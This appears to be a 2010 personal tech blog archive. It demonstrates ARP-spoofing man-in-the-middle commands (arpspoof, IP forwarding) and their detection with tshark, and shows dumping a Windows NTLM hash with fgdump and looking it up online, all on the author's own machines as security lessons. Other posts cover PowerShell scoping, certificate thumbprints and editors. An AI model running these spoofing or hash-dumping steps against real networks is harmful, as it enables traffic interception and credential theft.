Saturday, January 30, 2010

Using tshark to find the man in the middle

This post is targeted at people that understand ip addresses, default gateways and have heard of arp, but don’t play with them often enough to realize how vulnerable we are to man in the middle attacks.

Back in the old days, the network hardware was often a hub, and hubs had a property that all the computers connected to a hub could see each others traffic.  This meant if my computer and tori-the-lori were on the same hub tori-the-lori could see all my network traffic. This sound like weak security.  In time the world invented switches, and now almost all networking uses switches. Switches differ from hubs in that computers only see traffic that is sent to them, not everyone's traffic.  This difference should fix the weak security right?   Well, as with most things security the devil is in the details. Lets dig in.

When a computer wants to talk another computer by IP address, it needs to find the MAC address for the IP address, this is done via ARP.  Lets have a look at my home network.

Background info:
    My machine is @  192.168.1.101
    Tori-The-Lori is another machine in my network @ 192.168.1.100
    My default gateway is @ 192.168.1.1

 C:\Users\igord>ipconfig | findstr 192.168.1.1 
IPv4 Address. . . . . . . . . . . : 192.168.1.101
Default Gateway . . . . . . . . . : 192.168.1.1

C:\Users\igord>ping -4 tori-the-lori
Pinging tori-the-lori [192.168.1.100] with 32 bytes of data:


Q: How does my machine know where to find 192.168.1.100?

A: 192.168.1.100 has a MAC address  - MAC addresses are stored in the arp table, lets look at the ARP table:



PS C:\> arp -a | findstr 192.168.1.100 
192.168.1.100 00-22-5f-7e-f5-79 dynamic


Q: Can I erase that entry from  ARP table?


A:  Yup



PS C:\> arp -d 192.168.1.100
PS C:\> arp -a | findstr 192.168.1.100


Q: If I delete the ARP entry how will my machine find 192.168.1.100 again?

A: Lets watch arp traffic in tshark :)



PS C:\Program Files (x86)\Wireshark> .\tshark -i 4 -R "arp"
Capturing on Microsoft
7.202265 IntelCor_2f:5a:22 -> Broadcast ARP Who has 192.168.1.100? Tell 192.168.1.101
7.207136 LiteonTe_7e:f5:79 -> IntelCor_2f:5a:22 ARP 192.168.1.100 is at 00:22:5f:7e:f5:79


Q: How does my machine get a packet to bing?


A: My machine uses DNS to get the IP address, then my machine uses the default gateway (192.168.1.1) to send the packet to bing(69.31.112.153).



Pinging a134.g.akamai.net [69.31.112.153] with 32 bytes of data:
Reply from 69.31.112.153: bytes=32 time=50ms TTL=54


Back in Wireshark:



PS C:\Program Files (x86)\Wireshark> .\tshark -i 4 -R "icmp" -T fields -e eth.src -e eth.dst -e ip.src -e ip.dst
Capturing on Microsoft
00:21:6a:2f:5a:22 00:08:54:87:86:9c 192.168.1.101 69.31.112.153
00:08:54:87:86:9c 00:21:6a:2f:5a:22 69.31.112.153 192.168.1.101


Notice the packet to and from bing's IP address is my default gateway:



PS C:\Program Files (x86)\Wireshark> arp -a  | findstr 192.168.1.1
Interface: 192.168.1.101 --- 0xe
192.168.1.1 00-08-54-87-86-9c dynamic


Q: Can someone evil say  they are 192.168.1.1?



A: Yup. I can transform my happy linux laptop, via these commands into an evil man in the middle:



#enable routing 
vmplanet@ubuntu-vm:~$ sudo sysctl -w net.ipv4.ip_forward=1

# tell 101 I’m really the default gateway.
vmplanet@ubuntu-vm:~$ sudo arpspoof -t 192.168.1.101 192.168.1.1 > /dev/null

#tell the default gateway I’m really 101.
vmplanet@ubuntu-vm:~$ sudo arpspoof -t 192.168.1.1 192.168.1.101 > /dev/null


Q: What do I see on my windows box?



A: I wouldn’t be looking, but if you were you’d see this:



PS C:\Program Files (x86)\Wireshark> .\tshark -i 4 -R "arp or icmp"
Capturing on Microsoft
0.697050 IntelCor_2f:5a:22 -> IntelCor_2f:5a:22 ARP 192.168.1.1 is at 00:21:6a:2f:5a:22
1.997779 192.168.1.103 -> 192.168.1.101 ICMP Redirect (Redirect for host)
2.698765 IntelCor_2f:5a:22 -> IntelCor_2f:5a:22 ARP 192.168.1.1 is at 00:21:6a:2f:5a:22
3.022153 192.168.1.103 -> 192.168.1.101 ICMP Redirect (Redirect for host)
3.584377 192.168.1.103 -> 192.168.1.101 ICMP Redirect (Redirect for host)
4.699856 IntelCor_2f:5a:22 -> IntelCor_2f:5a:22 ARP 192.168.1.1 is at 00:21:6a:2f:5a:22
4.765403 192.168.1.103 -> 192.168.1.101 ICMP Redirect (Redirect for host)
6.445970 192.168.1.103 -> 192.168.1.101 ICMP Redirect (Redirect for host)
6.555464 192.168.1.103 -> 192.168.1.1 ICMP Redirect (Redirect for host)
6.653009 192.168.1.103 -> 192.168.1.101 ICMP Redirect (Redirect for host)


Or maybe this:



PS C:\Program Files (x86)\Wireshark> arp -a | findstr 192.168.1.1
Interface: 192.168.1.101 --- 0xe
192.168.1.1 00-21-6a-2f-5a-22 dynamic
192.168.1.100 00-22-5f-7e-f5-79 dynamic
192.168.1.103 00-21-6a-2f-5a-22 dynamic


What the heck?  192.168.1.103 has now hijacked my ARP entry for the default gateway (compare to what 192.168.1.1 was above)



Unfortunately, when I ping bing.com things still look right:



Pinging a134.g.akamai.net [69.31.112.82] with 32 bytes of data:
Reply from 69.31.112.82: bytes=32 time=37ms TTL=54

PS C:\Program Files (x86)\Wireshark> .\tshark -i 4 -R "icmp"
Capturing on Microsoft
5.758262 192.168.1.101 -> 69.31.112.82 ICMP Echo (ping) request
5.794958 69.31.112.82 -> 192.168.1.101 ICMP Echo (ping) reply
6.760151 192.168.1.101 -> 69.31.112.82 ICMP Echo (ping) request
11.304182 192.168.1.101 -> 69.31.112.82 ICMP Echo (ping) request
16.304111 192.168.1.101 -> 69.31.112.82 ICMP Echo (ping) request


But when we look closely, like at the  the MAC addresses – we realize all are packets go the man in the middle :(



PS C:\Program Files (x86)\Wireshark> .\tshark -i 4 -R "icmp" -T fields -e eth.src -e eth.dst -e ip.src -e ip.dst -e icmp
Capturing on Microsoft
00:21:6a:2f:5a:22 00:08:54:87:86:9c 192.168.1.101 69.31.112.106 icmp
00:08:54:87:86:9c 00:21:6a:2f:5a:22 69.31.112.106 192.168.1.101 icmp
00:21:6a:2f:5a:22 00:08:54:87:86:9c 192.168.1.101 69.31.112.106 icmp
00:08:54:87:86:9c 00:21:6a:2f:5a:22 69.31.112.106 192.168.1.101 icmp
00:21:6a:2f:5a:22 00:21:6a:2f:5a:22 192.168.1.101 69.31.112.106 icmp


Now that I’ve shown you how easy it is to become a man in the middle you should be thinking about what you are doing so the man in the middle can’t see you.

Saturday, January 23, 2010

The whitespace and indentation debate

Nothing annoys me more than having to argue over whitespace and indentation. Where should we stick the braces? Spaces vs Tabs? Can't we find something more useful to argue over?

Long ago I read the only to end the pointless whitespace debate, is to have the compiler reject random whitespace. I thought that was a very good idea, and today I'll talk about it.

In the beginning whitespace didn't matter, it was there for the human, and the program ignored it.   But that caused an annoying problem - you ended up needing tokens like '{' ';' and '(' and then you needed to argue about how you arranged the code around those tokens.  For example:

ProcessIncomingDogs(List<Dog> dogs)
{
...
if (dogs>1)
{
RunAway(smallDogs,speed.Fast);
Log("SmallDogs Ran Away Fast");
}
Log("EveryOne Ran Away that needed to");
...
}


I'm happy to say we're making progress, python gets rid of the annoying braces and instead denotes blocks via whitespace instead.  As a result many python programmers feel that python looks like sudo code. For Example:



def ProcessIncomingDogs(dogs):
...
if dogs>1:
RunAway(smallDogs,speed.Fast)
Log("SmallDogs Ran Away Fast")
Log("EveryOne Ran Away that needed to");
...


This is good, but there is annoying problem with python. Which whitespace will you use? Spaces or Tabs? Since whitespace implies meaning, mixing spaces and tabs makes real python bugs.



I was very excited to discover that F#, which also relies heavily on whitespace, does not allow tabs for whitespace. I'm thrilled!  Finally the whitespace debate is over in F#. Hopefully more languages will follow F#'s lead. For example:



let ProcessIncomingDogs dogs =
...
if dogs > 1 then
RunAway smallDogs speed.Fast
Log "SmallDogs Ran Away Fast"
Log "EveryOne Ran Away that needed to"
...


By the way, if you are lucky enough to use C#, an excellent way to enforce consistent coding is StyleCop. It has a sane set of rules and decent tooling.  For example the StyleCop for Resharper plugin can perform as you type auto-correction to fit the StyleCop coding convention.



May you never have to waste your life arguing over whitespace and indentation again!

Friday, January 15, 2010

Salting your hash, chasing rainbows and cracking passwords

Henry Ford takes 3 of his division presidents out for diner to decide which of them will be the new CEO. As soon as they start eating Mr. Ford chooses Bob, the man to his left, to be the new CEO. The other division presidents are shocked, and ask why Bob was picked over them. Henry replies: Bob was the only man who tasted his food before salting it.

Unlike at dinner time, hashes should always be salted. A hash is a one way function that maps something, for this discussion a password, to a short string. The point of a hash is if you're given the hash, you can't figure out the password. A common scenario for hashes is checking users passwords. Instead of storing a users passowrd and checking the passwords match, you store the hash of the users password, and make sure a hash of the users password matches the hash you stored. The advantage of storing the hash is if someone steals your disk they don't get your user's passwords.

There's a rub though. What happens if two users have the same password? Then both passwords will have the same hash. Uhoh, now we know if multiple users have the same password. This is bad! Now lets say I'm a bad guy, and compute the hashes for all the common passwords ahead of time? This is called a dictionary attack. You might be asking yourself if a dictionary attack is feasible - how much space is needed to store said dictionary? A hash is usually 20 bytes, to make the math easier lets assume it's only 16 (2^4) bytes. Lets make a dictionary for an 8 digit password; each character can be uppercase, lowercase or a numbers (26+26+10) = 62 (~ 2^6) choices per character x 8 (2^3) characters.

= (2^6)^8 * 2^4 bytes

= 2^48 passwords * 2^4 bytes storage for hash.

= 2^52 bytes for storage

~ 4,000 TB for storage.

This is really big, and clearly not feasible. Fortunately for attackers there is a trick you can play called a rainbow table. A rainbow table is a time space trade off algorithm were you can do a lot of upfront computation to cut down on the amount of required storage in the dictionary. This technique is very effective. The rainbow table for Vista for the 8 character password I describe in this blog post is only 153 GB and you can buy it here.

To defend against rainbow table attacks, we add salt. Before hashing the password, you prepend some random bytes, which we call salt. Then we store the salt alongside the hash. To verify the users password you prepend the users password with the stored salt, do the hash, and check for a match.

This rainbow table attack can be used against my windows box – watch this:

1) create a user account with password dogfood.

c:\temp>net user sillyuser dogfood /add
The command completed successfully.

2) Dump password hash using tool called fgdump.

c:\temp>c:\bin_drop\fgdump.exe >junk

c:\temp>findstr sillyuser *
127.0.0.1.pwdump:sillyuser:1006:NO PASSWORD*********************:72B76234CCC8E047C6D12F2E391F5DF7:::


3) Lookup hashes for your password on a helpful website: http://lmcrack.com/index.php



ASCII : dogfood 
Hex. : 646f67666f6f64
LM : 655C44FFBF761281AAD3B435B51404EE
NTLM :72B76234CCC8E047C6D12F2E391F5DF7
MD5 : 5D6423C4CCDDCBBDF0FCFAF9234A72D0
MD4 : E840B5EB9173B2E137AB14A98742A285
SHA1 : 67A2C23E0AEF5D92CBE084E22AA8E9A9311322C8
SHA256 : E674F78D2BF55FD93C878F7FE14448ABE677E7C3160F820AC6A012E457520B81


4) Clean up



c:\temp>net user /delete sillyuser
c:\temp>del *.*
The command completed successfully.

Thursday, January 14, 2010

How do you thumbprint a certificate?

You often use thumbprints to find certificates, but what is the thumbprint?  The thumbprint is the hash of the certificate. In the case of the CLR’s X509Certificate2 class, the thumbprint is the SHA1 hash of the certificate. If you want to compute the thumbprint of a certificate yourself it’s pretty simple:

 
function get-CertThumbprint ($cert)
{
$sha = new-object System.Security.Cryptography.SHA1CNG
$hashOfRawBytesOfCertificate = $sha.ComputeHash($cert.RawData)
( $hashOfRawBytesOfCertificate| % {"{0:X}" -f $_} ) -join ""
}


 
PS cert:\LocaLMachine\My> dir


Directory: Microsoft.PowerShell.Security\Certificate::LocaLMachine\My


Thumbprint Subject
---------- -------
3BCA8A25A071300BD177E4C73135E54FA830039A CN=STS
08766D8B3DCDE5D633ED06AB1CB4DF4CCAECA533 CN=localhost

PS cert:\LocalMachine\My> $cert = get-item 08766D8B3DCDE5D633ED06AB1CB4DF4CCAECA533
PS cert:\LocalMachine\My> $cert.Thumbprint
08766D8B3DCDE5D633ED06AB1CB4DF4CCAECA533
PS cert:\LocalMachine\My> get-CertThumbprint $cert
8766D8B3DCDE5D633ED6AB1CB4DF4CCAECA533


If you’re wondering why you don’t use the subject name to identify a certificate, it’s because you can have lots of certificates with the same subject name.

Sunday, January 10, 2010

A better blog editor - Windows Live Writer

I've been complaining about the blogger online blog editor forever. Today I took Windows Live Writer out for a spin and I like it. It's free, and it works with blogger without a hitch. My favorite feature is its preview pane which shows an actual preview of your post in the blog, which the blogger editor doesn't do at all.

In my heart of hearts I’ve always believe a rich client application should be more powerful then web applications, and in this case it is.

Saturday, January 9, 2010

Keyboard shortcuts in Windows WYSIWG editors

I have a day job, and in that job I use Word, OneNote and Outlook.  For style I only use bold, italics, underline, headings 1-3 and lists. For some reason, I never learned the keyboard shortcuts for some of these, and thus I need the mouse to apply these styles. In case you suffer like me, here’s are the shortcuts that will set your mouse free.

Style Word OneNote
Heading 1 C-A-1 C-A-1
Heading N C-A-N C-A-N
Bulleted List C-S-L C-.
Numbered list ? C-/
Underline C-U C-U
Italics C-I C-I
Bold C-B C-B

Powershell is dynamically scoped, and that will confuse you.

Lets start with an example, as the concept of dynamic scoping is a big string for most programmers.

Python Program
x = 5
def printX():
print x
def setAndprintX():
x=7
printX()
printX()
setAndPrintX()
printX()





Output From Python




5
5
5

Powershell Program




$x = 5
function printX() { echo $x }
function setAndprintX()
{
$x=7
printX
}
printX
setAndprintX
printX





Output From Powershell




5
7
5








What is this dynamic scoping?


Most programs use static, also called lexical, scoping because it's easy to understand. You figure out what is in scope by looking at the source code. In the python example, the only value of x in scope is the global value of x.







By contrast, powershell uses dynamic scoping, in this model, you lookup up variables at runtime based on a scope stack. Each time you call a function you create a new scope, and copy all values from the parent scope into it. In the powershell example, when printX is called from setAndprintX we get the value of $x that was set in setAndprintX scope.






Why would you want dynamic scoping?



I can't come up with a good explanation of why you'd pick dynamic scoping over lexical scoping. My hunch was this is historical as it's how batch files and shell scripts work. Interestingly, Perl supports both dynamic scoping and lexical scoping. You can read a good article about it here. My synopsis of why Perl has dynamically scoped variables from the article:









  • In the beginning perl only supported global variables and that was painful.


  • Since it was cheap to implement Perl authors added the ability to created dynamically scoped variables (via:local keyword).


  • However, when perl authors got time, they added lexical scoped variables (via: my keyword).


  • Now people are told *not* to use dynamically scoped variables since they're weird.






Do you get other language features to make support for this easier:


Yes, you can write to a different scope explicitly:




$x = 3 # Write to local scope
$global:x = 3 # Write to global scope.





You can also execute your function without creating a new scope via '.' aka sourcing:




. func() # runs the function in local scope, and variables created are visible.





This is a fascinating , but why are we having this conversation?


Because I wanted to write:




function getPrintDogFunction()
{
function Nested1(){echo"dog"}
function Nested2(){Nested1}
Get-Command Nested2
}

$printDog = getPrintDogFunction
# Call PrintDog
& $printDog

# This Call fails saying can't find Nested1 - which makes sense it's not in scope.

So, I changed my code to the following:




# source getPrintDogFunction, which causes Nested1 and Nested2 to be created in my scope, and thus
# Nested1 is in scope when I call printDog

$printDog = . getPrintDogFunction
# Call $printDog
& $printDog





A few days pass, and I add a new feature, printCat. Via the power of cut and paste our code becomes:




function getPrintDogFunction()
{
function Nested1(){echo "dog"}
function Nested2(){Nested1}
Get-Command Nested2
}

function getPrintCatFunction()
{
function Nested1(){echo "cat"}
function Nested2(){Nested1}
Get-Command Nested2
}

$printDog = . getPrintDogFunction
$printCat = . getPrintCatFunction

# Print all the animals
& $printDog
& $printCat

# Grrr - this is printing cat cat.
# Worse yet depending on the order of these calls, the behavior changes.





To fix I use the following pattern:




function getPrintCatFunction()
{
function Nested2()
{
function Nested1(){echo "cat"}
Nested1
}
Get-Command Nested2
}

$printDog = getPrintDogFunction




And now the world makes sense.



Notes:


(1) If you've never heard of dynamic scoping, any language you pick will act the same.

Sunday, January 3, 2010

Syntax Highlighting Take 2

Readers of my blog complained that they can't see the code I was syntax highlighted in RSS readers like Google reader. The reason is moderately interesting so I'll explain it:



HTML likes to gobble up white space, so if you're pasting in source code you use the PRE (preformatted text) tag. PRE shows up in fixed width font and preserves spacing; however you can't place < or > in PRE tags since they denote HTML tags, instead you need to use &lt or &gt (character entity references if you speak techno babble). This is annoying, especially given the blogger text editor gets confused when you edit PRE tags with nested < and > signs.



Speaking of < and >, source code, and HTML files, you often want to write javascript in an HTML file, and you then hit the similar problem that you want to write x < 99, but can't since '<' isn't valid HTML. To solve this problem you can put a CDATA(*) section in your script blocks, which allows you to use write x < 99.



So, to avoid specifying > and <, the author of SyntaxHighlight came up with a clever solution: Put the source code you'd like to display in a non-javascript script block using CDATA, and then use javascript on the page to convert these blocks to tables for the web browser to display.



This works great in your web browser, but RSS readers don't run the javascript that converts the dummy script blocks into tables and thus you can't see the code.  



Luckily, SyntaxHighlighter also supports an usage where you use specify your code in PRE blocks.  It's more annoying for me (for the above reasons), but it's better for my beloved readers since the PRE elements 'degrade' to non syntax highlighted pre blocks (instead of nothing) when in an RSS reader.





For all my RSS reader friends here is the snippet from the last blog post:



Console.Writeline("Hello World!")
Python:

print "Hello World"




NOTES:



(*) CDATA,aka: character data, is not interpreted as part of the document.  In CDATA,  >  means greater than and does not have to be written as character entity references. Unfortunately CDATA can not be placed in PRE blocks.